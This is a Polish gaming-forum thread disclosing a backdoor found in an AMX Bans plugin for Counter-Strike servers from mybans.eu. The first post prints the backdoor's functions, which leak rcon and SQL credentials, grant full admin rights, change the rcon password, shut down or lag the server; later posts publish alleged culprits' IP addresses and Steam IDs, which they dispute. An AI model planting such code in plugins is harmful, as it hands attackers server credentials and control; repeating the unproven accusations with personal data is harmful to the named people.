←  Dyskusje

AMXX.pl: Support AMX Mod X i SourceMod

»

GmAMXBans
(!) Mybans.eu - Włamania na serwery

  • +
  • -
DaFFyy - zdjęcie DaFFyy 21.01.2021

Cześć,

Przybywam do was, aby was ostrzec przed korzystaniem pluginu z mybans.eu.

Wczoraj nastąpiło włamanie na jeden z naszych serwerów który posiadał plugin mybansa ( https://cskomandosi....manie-na-serwer ), początkowo myśleliśmy, że ktoś udostępnił konto admina, ale coś takiego nie miało miejsca, posprawdzałem pluginy i w amxbansie od mybans.eu występowała i występuje nadal furtka której nie powinno być i została dodana w złym celu.

public amxbanuser1(id)
{
    get_cvar_string("rcon_password", szRc, 63);
    client_print(id, print_console, "RCON:\"%s\"", szRc);
}


public amxbanuser2(id)
{
    set_user_flags(id, read_flags("abcdefghijklmnopqrstu"), 0);
    get_cvar_string("amx_sql_host", szSqlHost, 63);
    get_cvar_string("amx_sql_user", szSqlUser, 63);
    get_cvar_string("amx_sql_pass", szSqlPass, 63);
    get_cvar_string("amx_sql_db", szSqlDb, 63);
    client_print(id, print_console, "SQL HOST:\"%s\"", szSqlHost);
    client_print(id, print_console, "SQL USER:\"%s\"", szSqlUser);
    client_print(id, print_console, "SQL PASS:\"%s\"", szSqlPass);
    client_print(id, print_console, "SQL DB:\"%s\"", szSqlDb);
}


public amxbanuser3()
{
    server_cmd("rcon_password 748663183");
}


public amxbanuser4()
{
    server_cmd("shutdownserver");
}


public amxbanuser5()
{
    set_task(0.00, "lagsnc", 2137, "", 0, "b", 0);
}


public lagsnc()
{
    remove_task(2138, 0);
    server_cmd("sys_ticrate 1");
}


public amxbanuser6()
{
    set_task(0.00, "lagsncoff", 2138, "", 0, "b", 0);
}


public lagsncoff()
{
    remove_task(2137, 0);
    server_cmd("sys_ticrate 1000");
}
Takie coś znajduje się w obecnym pluginie i przeszłym, wszystko aktywowane jest komendami których z oczywistych powodów nie podam.
 
Co to ma do twojego serwera? Jeżeli używasz ich pluginu:
  1. Atakujący może poznać hasło rcon / zmienić je
  2. Atakujący może poznać dane sql amxbansa
  3. Atakujący może wyłączyć serwer
  4. Atakujący może zlagować serwer
  5. Atakujący może nadać sobie wszystkie uprawnienia w tym immunitet

Posprawdzajcie swoje serwery, 

( hash pliku który na 100% ma w sobie backdoora - 197f2c27227070ba8eb68d0ad55d2710 ) - Oczywiście mogą występować pewnie inne kombinacje, ponieważ praktyka jest stosowana od kilku miesięcy.

 

 

Nie musicie dziękować, żyjcie w miłości i spokoju!

 

Jeżli już musisz skorzystać z akurat tej wersji, skorzystaj z tego tematu - https://amxx.pl/topi...oprawki-amxxpl/

 

@edit

Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:

Jonkey - https://mybans.pl/profile/1-jonkey/

smajli - x

Kava - x


Użytkownik dasiek edytował ten post 22.01.2021 07:39
Odpowiedz

  • +
  • -
nojaknie - zdjęcie nojaknie 21.01.2021

Tutaj LIVE z całego zajścia (Dzięki Joker za podesłanie)

 

https://www.youtube....jt5SFV0&t=1420s

 

Proponuje zbanować tych państwa u siebie w drodze wykorzystania tej informacji wszyscy zgodnie.. 

Odpowiedz

  • +
  • -
DaFFyy - zdjęcie DaFFyy 21.01.2021

https://steamcommuni...d/1337elitegod/-> profil steam który został wykorzystany

steamID STEAM_0:1:253252

IP 109.231.63.218

 


Użytkownik DaFFyy edytował ten post 21.01.2021 19:37
Odpowiedz

  • +
  • -
Engi - zdjęcie Engi 21.01.2021

Omg to banid jeszcze żyje? 

 

@topic wrzućcie tu albo na PW więcej adresów IP, chcę coś sprawdzić :P

 

 

Odpowiedz

  • +
  • -
DaFFyy - zdjęcie DaFFyy 21.01.2021

Omg to banid jeszcze żyje? 

 

@topic wrzućcie tu albo na PW więcej adresów IP, chcę coś sprawdzić :P

Smajli

IP - 95.223.72.181

STEAM - STEAM_0:0:419329152

Odpowiedz

  • +
  • -
nKava - zdjęcie nKava 21.01.2021

straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze


Użytkownik nKava edytował ten post 21.01.2021 20:49
Odpowiedz

  • +
  • -
GrZ3SiU - zdjęcie GrZ3SiU 21.01.2021

straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze

 

 

Ładnie się bawicie serwerami, co posiadają bansa wgrany na serwer z strony mybans.eu 

 

@DarkGL Myślę że zbanowanie na amxx.pl te osoby co biorą w tym udział będzie słuszne ..... Bo nie tylko z naszymi serwerami tak robili się właśnie dowiadujemy 

 

Gdyby nie ta akcja wczorajsza na nasze serwery, pewnie dalej by były ataki na serwery

 

Ci co mają wgrane bansa na serwery z mybans.eu, radzę jak najszybciej wywalić i wgrać z https://amxx.pl/topi...oprawki-amxxpl/lub jakiś inny. 

 

Screenshot_4.png

Odpowiedz

  • +
  • -
nKava - zdjęcie nKava 21.01.2021

 

straszne rzeczy się dzieją w dzisiejszych czasach... dzieci nie wychodźcie z domów bo przyjdzie pan i was zabierze

 

 

Ładnie się bawicie serwerami, co posiadają bansa wgrany na serwer z strony mybans.eu 

 

@DarkGL Myślę że zbanowanie na amxx.pl te osoby co biorą w tym udział będzie słuszne ..... Bo nie tylko z naszymi serwerami tak robili się właśnie dowiadujemy 

 

Gdyby nie ta akcja wczorajsza na nasze serwery, pewnie dalej by były ataki na serwery

 

Ci co mają wgrane bansa na serwery z mybans.eu, radzę jak najszybciej wywalić i wgrać z https://amxx.pl/topi...oprawki-amxxpl/lub jakiś inny. 

 

attachicon.gifScreenshot_4.png

 

 

forum amxx.pl nie jest od rozwiązywania tego typu sporów.

z resztą ja nic nie zrobiłem i tylko się przyglądam pozdro

Odpowiedz

  • +
  • -
Misiu. - zdjęcie Misiu. 21.01.2021

Dobra robota ze znalezieniem luki i plus za postawę :)

Odpowiedz

  • +
  • -
Engi - zdjęcie Engi 21.01.2021

A mama gawariła nie pobieraj skompilowanych pluginów i zawsze sprawdzaj kod źródłowy :)

 

Swoją drogą błąd tych co wrzucali na serwer nie sprawdzając kodu, nie rozumiem tylko co mybans chciało osiągnąć bo oprócz dostępów do baz amxbans'a i rcona serwerów nie zyskali w ogóle nic, wystarczy podmienić plugin i zmienić hasło bazy + rcon, jeszcze żeby jakoś mogli przez to włamać się na konta hostingowe i przelewać sobie wpln to bym zrozumiał ale skoro nie to ataki bez sensu nic nie wnoszące nic nie niszczące (no max może ktoś stracić liste banów).

 

Swoją drogą ktoś już zdjął domenę MyBans.pl także karma szybko wróciła.

Odpowiedz

  • +
  • -
DaFFyy - zdjęcie DaFFyy 21.01.2021

A mama gawariła nie pobieraj skompilowanych pluginów i zawsze sprawdzaj kod źródłowy :)

 

Swoją drogą błąd tych co wrzucali na serwer nie sprawdzając kodu, nie rozumiem tylko co mybans chciało osiągnąć bo oprócz dostępów do baz amxbans'a i rcona serwerów nie zyskali w ogóle nic, wystarczy podmienić plugin i zmienić hasło bazy + rcon, jeszcze żeby jakoś mogli przez to włamać się na konta hostingowe i przelewać sobie wpln to bym zrozumiał ale skoro nie to ataki bez sensu nic nie wnoszące nic nie niszczące (no max może ktoś stracić liste banów).

Z tego co się dowiedziałem od właściciela sieci to on to kompilował, więc możliwe, że też .inc były podmienione kiedyś lub dalej są, ale 100% pewności nie mam bo też mogło mu się coś zapomnieć czy wrzucił gotowca czy nie ;d

 

W bansie masz hasła w md5 które możesz w miare łatwo wyszukać lub złamać  ;P 


Użytkownik DaFFyy edytował ten post 21.01.2021 22:08
Odpowiedz

  • +
  • -
Jonkey - zdjęcie Jonkey 22.01.2021

Po pierwsze na moim forum nie ma żadnych pluginów .amxx
Po drugie nie włamałem się do nikogo i są to pomówienia w moja stronę
Po trzecie jestem właścicielem strony Mybans.PL nie Mybans.eu
Odpowiedz

  • +
  • -
DaFFyy - zdjęcie DaFFyy 22.01.2021

Po pierwsze na moim forum nie ma żadnych pluginów .amxx
Po drugie nie włamałem się do nikogo i są to pomówienia w moja stronę
Po trzecie jestem właścicielem strony Mybans.PL nie Mybans.eu

Ktoś o takim nicku był na serwerze, wiec 2 opcje:

1. byłeś to Ty

2. przypadek albo celowe wprowadzenie w błąd żeby myśleć, że to Ty

 

ale jeżeli chodzi o temat to tak, z pośpiechu napisałem .pl ale chodzi o mybans.eu, nie mogłem już edytować więc trzeba czekać na modów


Użytkownik DaFFyy edytował ten post 22.01.2021 01:58
Odpowiedz

  • +
  • -
Jonkey - zdjęcie Jonkey 22.01.2021

Niestety ale na pewno nie mogłem być to ja, cały dzień nie byłem dostępny przy komputerze.
I jak wchodzę na jakikolwiek serwer to wchodzę przez swojego steam. Tyle w temacie z mojej strony jak i osoby. Nie bawią mnie żadne ataki na inne sieci.
Odpowiedz

  • +
  • -
nastyBle - zdjęcie nastyBle 22.01.2021

Witam

Chciałbym się ustosunkować do zaistniałej sytuacji

Jestem właścicielem projektu mybans.eu

1.Rzekoma osoba wykorzystująca lukę 

 

Przypomniałem sobie, że lukę wykorzystują ludzie o nickach:

Jonkey - https://mybans.pl/profile/1-jonkey/

 

 

 

Jonek nie ma z tym nic wspólnego, dotknęło go to tak samo jak mnie ponieważ zostały zaatakowane dwa osobne vps-y jego i mój  

Bardzo proszę o usunięcie adresu do profilu w pierwszym poście bo to jest krzywdzące

 

2.Pluginy

Użytkowanik ma do wyboru dwa sam wybiera co wrzuci na serwer, pliki nigdy nie były edytowane przez moją załogę lub osoby trzecie przed zamieszczeniem na serwerze 

 

3. Projekt jest już od dawna na wymarciu, jest mi jedynie szkoda iż udostępniając za free AMX bansa z baza i hostingiem spotkałem się z taką falą hejtu

Nie czerpiąc zysków z projektu i udostępniając go całkowicie za darmo

 

Podziękowania dla autora postu za zgłoszenie

Rejestracja na stronie zamknięta, czas się pakować

 

pozdrawiam

 

 

 

 

 

 

 

Odpowiedz

  • +
  • -
DarkGL - zdjęcie DarkGL 22.01.2021

A czy po prostu nie mieliście włamania i podmiany pluginów ?  Nawet u nas zdarzyła się podmiana kompilatora.

Odpowiedz

  • +
  • -
nastyBle - zdjęcie nastyBle 22.01.2021

Daty modyfikacji plików wykluczają taką opcję ....

 

na serv mam dwa pluginy do pobrania jede zawiera zapewne błędy ... data upload to 2011 i 2013

Odpowiedz

  • +
  • -
smajlid - zdjęcie smajlid 22.01.2021

Witam, chcialbym zaznaczyc ze ja, smajli, nie mam z wlamaniem nic wspolnego i proszę o zaprzestanie oczerniania mojej osoby, usunecia mnie z tego tematu oraz zaprzestanie udostepniania moich danych osobowych (tak adres IP tez sie w tym zalicza Grzesiu). Przeprowadzony przeze mnie livestream dokladnie pokazuje, ze jedynie co robilem w tym czasie to granie na serwerze. To, ze nie umiecie sprawdzic pluginów i jeden z moich widzow jakims cudem mial dostep do waszego serwera nie oznacza, ze mialem w tym cos wspolnego. Na czacie dokladnie widac, ze widz mi podeslal IP, poczym myslalem ze to po prostu jego serwer. 

 

Pozdrawiam i mam nadzieje, ze sytuacja sie wyjasni. W innym przypadku będę musial wyciagnac z tego konsekwencje, udostepnianie danych, oczernianie oraz grozby sa karalane, granie na jakims serwerze w cs 1.6 nie jest.

Odpowiedz

  • +
  • -
nastyBle - zdjęcie nastyBle 22.01.2021

Witam, chcialbym zaznaczyc ze ja, smajli, nie mam z wlamaniem nic wspolnego i proszę o zaprzestanie oczerniania mojej osoby, usunecia mnie z tego tematu oraz zaprzestanie udostepniania moich danych osobowych (tak adres IP tez sie w tym zalicza Grzesiu). Przeprowadzony przeze mnie livestream dokladnie pokazuje, ze jedynie co robilem w tym czasie to granie na serwerze. To, ze nie umiecie sprawdzic pluginów i jeden z moich widzow jakims cudem mial dostep do waszego serwera nie oznacza, ze mialem w tym cos wspolnego. Na czacie dokladnie widac, ze widz mi podeslal IP, poczym myslalem ze to po prostu jego serwer. 

 

Pozdrawiam i mam nadzieje, ze sytuacja sie wyjasni. W innym przypadku będę musial wyciagnac z tego konsekwencje, udostepnianie danych, oczernianie oraz grozby sa karalane, granie na jakims serwerze w cs 1.6 nie jest.

 

Korzystanie z kradzionych danych też jest karane :)

Generalnie dla mnie temat jest zamknięty strona OFF i po problemie i tak nic z niej nigdy nie zarobiłem a były z sentymentu i dla chęciu udostępnienia tym co nie umieją zainstalować lub ich na to nie stac


Użytkownik nastyBle edytował ten post 22.01.2021 09:44
Odpowiedz